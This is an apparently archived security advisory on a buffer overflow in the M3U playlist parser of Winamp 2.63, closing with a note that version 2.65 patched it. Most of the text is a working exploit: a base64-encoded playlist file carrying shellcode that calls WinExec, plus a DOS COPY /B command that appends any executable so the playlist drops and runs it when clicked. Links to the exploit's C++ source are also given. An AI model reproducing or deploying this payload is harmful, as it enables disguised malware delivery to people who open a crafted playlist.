|
Vulnerability WinAmp Affected Winamp 2.63 Description 'ByteRage' found following. He has written a full disclosure buffer overflow exploit for the winamp 2.63 buffer overflow found in the M3U file parser... Attached is a file called DROPPER.M3U, if you execute the following commands in dos: COPY /B DROPPER.M3U+C:\WINDOWS\CDPLAYER.EXE HACKME.M3U When you click HACKME.M3U, the file will drop and execute the appended exe file, CDPLAYER.EXE in this case... The CPP source for creating DROPPER.M3U is at: http://elf.box.sk/byterage/wa263bof.cpp and more info can be got from http://elf.box.sk/byterage/wa263.htm This hasn't been tested yet on 2.64 or underlying versions, but if the versions of IN_MOD.DLL match, those versions are vulnerable too... --- Content-Type: application/octet-stream; name="dropper.m3u" Content-Transfer-Encoding: base64 Content-Disposition: inline; filename="dropper.m3u" Content-MD5: Kjxu6Ci/fHfAvxuamfKQrA== I0VYVE0zVQ0KI0VYVElORjpYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhY WFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhY WFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhY WFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhY WFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhY WFhYWFhYWFhYWFhYWFhYWBCgERFYWFhYK4MREZCQM8BQNIBQagM0gFBqAzSAweAYUFP/FWiQ ERGL6DPJUVOxA8HhCFGDwwRTUP8VxJARETPJsX+AwX+DwW8D2f/TDQqQkFOL+4HD8wAAAIHH EgEAAFP/FVSQERGL8DPA10M8AHX4U1b/FViQERGrM8DXQzwAdfgzwNdDPAF01jwCdONoAEAA AGpA/1f4PQAAAAB0AJYzwFA0gFBqAjPAUFBoAAAAwFf/FWiQERE9/////3QAk2oAV2gAQAAA VlX/FcSQERGDPwB0D2oAV/83VlP/FdSQERHr3FP/FSiQERHHB1xFWFBqAVf/V/xqAP8VyJAR EZCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ kJCQkJCQkJCQkJCQkJBLRVJORUwzMgBHbG9iYWxBbGxvYwACV2luRXhlYwAAAAAAAAAAAABc RVhQTE9JVC5FWEUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA ----- Solution After checking the whatsnew.txt for Winamp, this security hole was patched in version 2.65.